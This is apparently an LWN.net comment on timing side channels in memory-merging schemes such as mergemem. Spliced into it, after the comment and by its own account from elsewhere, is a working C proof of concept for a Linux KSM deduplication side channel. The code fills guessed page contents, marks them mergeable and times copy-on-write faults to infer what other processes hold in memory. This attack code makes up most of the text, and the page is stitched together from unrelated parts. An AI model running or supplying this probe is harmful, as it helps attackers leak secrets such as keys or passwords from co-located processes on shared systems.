If one could only check whether full pages are merged, that would be
pretty hard to exploit (one would have to guess all of the page
correctly, i.e., usually the complete key or password).
Another potential attack path was using a timing attack based on how
long the merge attempt takes, or how much of the merge-attempted pages
is in the cache afterwards. That would bring the granularity down to
a word or a cache line, which makes guessing much more practical.
IMO, even that attack path could be blocked relatively easily (e.g.,
allow only merging corresponding pages from processes that run the
same binary, and were not tainted with ptrace or somesuch).
My impression was that too much emphasis was given to the
vulnerabilities in the mergemem announcements, and that may be one
reason why there was not much interest in it.
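The write-latency variant of the timing attack described above, as an added example that is not from this discussion or from mergemem itself. It is written against Linux KSM, the modern analogue of mergemem, using the real madvise(MADV_MERGEABLE) interface; the functions measure_baseline, probe_guess, looks_merged and median, the 10x latency ratio and the sample content are this example's own choices. A merge only happens if KSM is enabled on the host (/sys/kernel/mm/ksm/run set to 1); otherwise the probe reports "not merged" or "KSM unavailable".

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef MADV_MERGEABLE
#define MADV_MERGEABLE 12   /* value from <linux/mman.h>, for older headers */
#endif

#define SAMPLES 31

static uint64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Time a single write to the first byte of a page. */
static uint64_t time_write(volatile unsigned char *page)
{
    uint64_t t0 = now_ns();
    page[0] ^= 0x01;
    return now_ns() - t0;
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples; sorts in place. */
uint64_t median(uint64_t *v, size_t n)
{
    qsort(v, n, sizeof v[0], cmp_u64);
    return v[n / 2];
}

/* A write to a merged page is copy-on-write: a page fault plus a page copy,
 * typically microseconds. A write to a private page is tens of nanoseconds.
 * Classify by ratio to the baseline median so the threshold is CPU-independent
 * (assumed ratio; a real probe would repeat and vote to filter interrupts). */
int looks_merged(uint64_t baseline_med, uint64_t probe_ns, unsigned ratio)
{
    return probe_ns >= baseline_med * (uint64_t)ratio;
}

/* Baseline: repeated writes to a page already faulted in and never offered
 * for merging. Returns 0 if the mapping fails. */
uint64_t measure_baseline(void)
{
    long psz = sysconf(_SC_PAGESIZE);
    unsigned char *p = mmap(NULL, psz, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    uint64_t s[SAMPLES];
    if (p == MAP_FAILED) return 0;
    p[0] = 0xAA;                     /* take the first-touch fault now */
    for (int i = 0; i < SAMPLES; i++)
        s[i] = time_write(p);
    munmap(p, psz);
    return median(s, SAMPLES);
}

/* Fill a page with one guess for a victim page, offer it to KSM, wait for a
 * scan, then time the first write. 1 = latency suggests the page was merged
 * (the guess matched another page on the system), 0 = not merged,
 * -1 = KSM unavailable. The attack iterates this over candidate contents. */
int probe_guess(const unsigned char *guess, size_t len, unsigned wait_sec,
                uint64_t baseline_med)
{
    long psz = sysconf(_SC_PAGESIZE);
    unsigned char *p = mmap(NULL, psz, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return -1;
    memset(p, 0, psz);
    memcpy(p, guess, len < (size_t)psz ? len : (size_t)psz);
    if (madvise(p, psz, MADV_MERGEABLE) != 0) {   /* kernel without CONFIG_KSM */
        munmap(p, psz);
        return -1;
    }
    sleep(wait_sec);                 /* give ksmd time to scan and merge */
    uint64_t t = time_write(p);
    munmap(p, psz);
    return looks_merged(baseline_med, t, 10);
}

int main(void)
{
    /* Constructed guess; an attacker substitutes candidate page images. */
    static const unsigned char guess[] = "constructed candidate page content";
    uint64_t base = measure_baseline();
    int r = probe_guess(guess, sizeof guess, 5, base);
    printf("baseline write %llu ns, verdict: %s\n", (unsigned long long)base,
           r < 0 ? "KSM unavailable" : r ? "merged" : "not merged");
    return 0;
}
```

The page-or-nothing granularity the first paragraph mentions is visible here: probe_guess only answers for a whole 4 KiB image, so the guess must match every byte. The cache-residency variant that narrows this to a cache line would replace time_write with a load-timing probe over the lines of the page, which this example does not implement.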
Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds